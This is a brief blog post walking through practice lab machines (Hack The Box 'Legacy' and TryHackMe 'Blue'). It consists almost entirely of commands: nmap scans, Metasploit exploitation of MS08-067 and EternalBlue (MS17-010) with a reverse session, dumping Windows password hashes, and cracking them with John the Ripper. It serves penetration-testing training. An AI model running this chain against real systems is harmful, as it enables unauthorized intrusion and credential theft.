Mastering EternalBlue MS17–010 & MS08–067: A Hands-On, Step-by-Step Walkthrough to Exploiting Legacy Windows Vulnerabilities

November 23, 2024

Mastering EternalBlue MS17–010 & MS08–067: A Hands-On, Step-by-Step Walkthrough to Exploiting Legacy Windows Vulnerabilities

MS08-067

nmap -p0- -Pn -sC -sV --min-rate 2000 --max-retries 8 -iL legacy.htb --stats-every 60 --reason -oN all-port-nmap-output.txt

nmap -p 135,139,445 -Pn -O -sV -sC --script vuln -min-rate 2000 -iL legacy.htb -stats-every 60 -oN detailed-nmap-output.txt

msfconsole

search ms08-067
use 0
options
set RHOSTS <ip>
set LHOST tun0 
run OR exploit
pwd
cd ../../
pwd
dir
cd "Documents and Settings"
dir 
cd Administrator 
cd Desktop
dir
cat root.txt

Eternal Blue MS17-010
nmap -p0- -Pn -sC -sV --min-rate 2000 --max-retries 8 -iL blue.thm --stats-every 60 --reason -oN all-port-nmap-output.txt
nmap -p 135,139,445 -Pn -O -sV -sC --script vuln -min-rate 2000 -iL blue.thm -stats-every 60 -oN detailed-nmap-output.txt
msfconsole
search ms17-010
use 0
options
set RHOSTS <ip>
set lhost tun0
run
getuid
shell
CTRL + Z and type y
hashdump
Copy and past jon's hash into a text editor and then save
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
pwd
dir
cat flag1.txt

Search

Ends2Tech

Mastering EternalBlue MS17–010 & MS08–067: A Hands-On, Step-by-Step Walkthrough to Exploiting Legacy Windows Vulnerabilities

MS08-067

Eternal Blue MS17-010

Comments

Post a Comment

Popular Posts

OWASP - SQLi Attack Walkthrough Part 1